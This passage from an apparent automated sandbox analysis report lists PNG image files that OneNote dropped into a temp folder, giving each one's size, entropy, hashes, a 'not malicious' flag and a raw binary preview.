..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{557B22FD-F2E6-4FE5-B8A2-73855E73527A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{56DF2B4E-6EC2-40B4-BDA1-CFACD1CCE0E4}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{57B04693-C995-42E0-A4B4-D1A26EE9ED22}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{5AFF18A6-51B6-4D35-AF5C-D80017AC0EB2}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{5C6E1693-44B6-48FF-BCE8-86DB3DFDCF15}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{5E5843A9-20F2-4BD1-A856-20B1E5C06AE1}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{607E7879-48C6-45DB-8126-DB89BAFC6645}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{6124E01C-FDC8-40B5-A803-835132665B63}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{61479C0C-3F1E-4657-9D61-01A1720F7338}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{642FAD41-621F-4E2E-80B0-951D21BD0640}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{647C768E-D5AA-4D5D-83D7-22D6D7B1BBB5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{6504E7A7-AB23-4CBC-B866-08F2A90BA04E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{682EAA4A-70AD-4018-8737-47E550DFD92A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{6AC848C9-EF12-416D-BBAC-E56119A5A62E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
